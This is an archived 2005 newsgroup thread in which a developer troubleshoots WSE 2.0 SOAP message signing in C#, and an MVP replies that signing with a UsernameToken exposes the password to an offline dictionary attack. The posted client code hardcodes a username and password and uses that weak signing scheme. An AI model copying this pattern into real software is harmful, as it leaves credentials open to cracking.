Re: WSE 2.0 security problem
From: William Stacey [MVP] (staceywREMOVE_at_mvps.org)
Date: 02/04/05
- Next message: Paul Aspinall: "Packaging MSDE in with Winforms C# app, using Windows packages"
- Previous message: VMI: "making sure <Enter> key always works???"
- In reply to: Michael Rodriguez: "Re: WSE 2.0 security problem"
- Messages sorted by: [ date ] [ thread ]
Date: Fri, 4 Feb 2005 15:32:27 -0500
The one problem you still have is signing the message with the user token.
This is *not secure in the least. That password would be cracked in a few
seconds off the wire - *even if you use SendNone. Hacker just does the
dictionary attack on the signature. UsernameTokens should only be sent if
they are encrypted first - either inside an SSL session or using a
SecurityContextToken. If you use a SCT, then you don't need to send the UT
anyway. So I would use only SCTs and require on the server each message is
at *least signed with an *authenticated SCT (or a token derived from an
authenticated SCT).
See:
http://spaces.msn.com/members/staceyw/Blog/cns!1pnsZpX0fPvDxLKC6rAAhLsQ!303.entry
http://spaces.msn.com/members/staceyw/Blog/cns!1pnsZpX0fPvDxLKC6rAAhLsQ!268.entry
http://msdn.microsoft.com/webservices/default.aspx?pull=/library/en-us/dnwse/html/securusernametoken.asp
-- William Stacey, MVP http://mvp.support.microsoft.com "Michael Rodriguez" <mike__at__compeat_dot_com> wrote in message news:67FC8DFC-14C8-443B-A717-D758C5393B59@microsoft.com... > Nicholas, > > Thanks for the quick response. I figured out what is was. I enabled > tracing in the web.config so I could see the SOAP responses. When I looked > at those, I saw the problem was a timeout error. I had set the TimeToLive to > 2 minutes, and the computer I was sending the request from was 10 minutes > behind the Web server! All I had to do was sync the time and then it worked > fine. > > Thanks, > > Mike Rodriguez > > "Nicholas Paldino [.NET/C# MVP]" wrote: > > > Michael, > > > > Are you sure that you are signing the message? The code here just adds > > some authentication, but I see nothing that loads a digital certificate (is > > that what the MessageCertificate does?). > > > > Also, if you have a certificate loaded in a store on the machine that is > > doing the signing (your dev machine), then you have to make sure that > > certificate is installed on the other machine that you installed the proxy > > on. > > > > Hope this helps. > > > > > > -- > > - Nicholas Paldino [.NET/C# MVP] > > - mvp@spam.guard.caspershouse.com > > > > "Michael Rodriguez" <mike__at__compeat_dot_com> wrote in message > > news:C57EC39E-645A-4A0B-B205-C7EC27E6C1C6@microsoft.com... > > >I have a web service that I am calling by digitally signing the message > > >with > > > WSE 2.0 SP2. It runs fine on my PC. I uploaded the WS to our server, and > > > if > > > I call that from my PC that also works fine. > > > > > > The problem comes in when I try to call the WS from another machine > > > besides > > > mine or the host server. When I do that, I get "An error was discovered > > > processing the <Security> header"... > > > > > > Is there something else I need to install on other machines to get my WSE > > > security working? I installed the WSE 2.0 runtime files, that didn't > > > help. > > > Any ideas? > > > > > > Here is the client code that calls the web service: > > > > > > public CateringWS.DataServWse GetProxy() > > > { > > > CateringWS.DataServWse proxy = new CateringWS.DataServWse(); > > > proxy.Url = "http://my_ip_address_here/CateringWS/DataServ.asmx"; > > > > > > // Get the SoapContext for the SOAP request that is being made to the > > > Web service > > > SoapContext reqCtx = proxy.RequestSoapContext; > > > > > > // Add the UsernameToken to the WS-Security SOAP header > > > /* Help File Excerpt: The password is never sent in any form in the > > > SOAP message, > > > * but WSE does use the password to sign the SOAP message. > > > * A recipient would then need to provide a password to WSE > > > * during the signature validation stage. */ > > > UsernameToken tok = new UsernameToken("mike", "amanda1", > > > PasswordOption.SendNone); > > > > > > // set the TimeToLive to 2 minutes, to prevent anyone else from > > > replaying it > > > reqCtx.Security.Timestamp.TtlInSeconds = 120; > > > > > > // Digitally sign the SOAP request by using a user name and password. > > > reqCtx.Security.Tokens.Add(tok); > > > reqCtx.Security.Elements.Add(new MessageSignature(tok)); > > > // reqCtx.Security.Elements.Add(new EncryptedData(tok)); > > > > > > return proxy; > > > } > > > > > > public ChartOfAccountsInfo[] GetChartOfAccounts() > > > { > > > CateringWS.DataServWse proxy = GetProxy(); > > > try > > > { > > > return proxy.GetChartOfAccounts(); > > > } > > > catch (Exception ex) > > > { > > > throw new ApplicationException(ex.Message); > > > } > > > } > > > > > > TIA, > > > > > > Mike Rodriguez > > > > > > -- > > > To understand recursion, we must first understand recursion. > > > > > >
- Next message: Paul Aspinall: "Packaging MSDE in with Winforms C# app, using Windows packages"
- Previous message: VMI: "making sure <Enter> key always works???"
- In reply to: Michael Rodriguez: "Re: WSE 2.0 security problem"
- Messages sorted by: [ date ] [ thread ]
Relevant Pages
|
